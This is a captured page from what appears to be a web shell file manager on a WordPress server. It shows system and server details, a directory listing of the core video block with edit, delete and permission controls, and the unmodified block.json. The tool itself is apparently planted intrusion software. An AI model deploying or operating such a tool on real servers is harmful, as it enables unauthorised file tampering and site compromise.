[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
blocks
/
video
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
1,964 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.css
1,218 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.min.css
1,112 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.css
1,215 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.min.css
1,109 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.css
337 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.min.css
291 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.css
337 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.min.css
291 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.css
200 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.min.css
176 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.css
200 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.min.css
176 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/video", "title": "Video", "category": "media", "description": "Embed a video from your media library or upload a new one.", "keywords": [ "movie" ], "textdomain": "default", "attributes": { "autoplay": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "autoplay" }, "caption": { "type": "rich-text", "source": "rich-text", "selector": "figcaption", "role": "content" }, "controls": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "controls", "default": true }, "id": { "type": "number", "role": "content" }, "loop": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "loop" }, "muted": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "muted" }, "poster": { "type": "string", "source": "attribute", "selector": "video", "attribute": "poster" }, "preload": { "type": "string", "source": "attribute", "selector": "video", "attribute": "preload", "default": "metadata" }, "blob": { "type": "string", "role": "local" }, "src": { "type": "string", "source": "attribute", "selector": "video", "attribute": "src", "role": "content" }, "playsInline": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "playsinline" }, "tracks": { "role": "content", "type": "array", "items": { "type": "object" }, "default": [] } }, "supports": { "anchor": true, "align": true, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "interactivity": { "clientNavigation": true } }, "editorStyle": "wp-block-video-editor", "style": "wp-block-video" }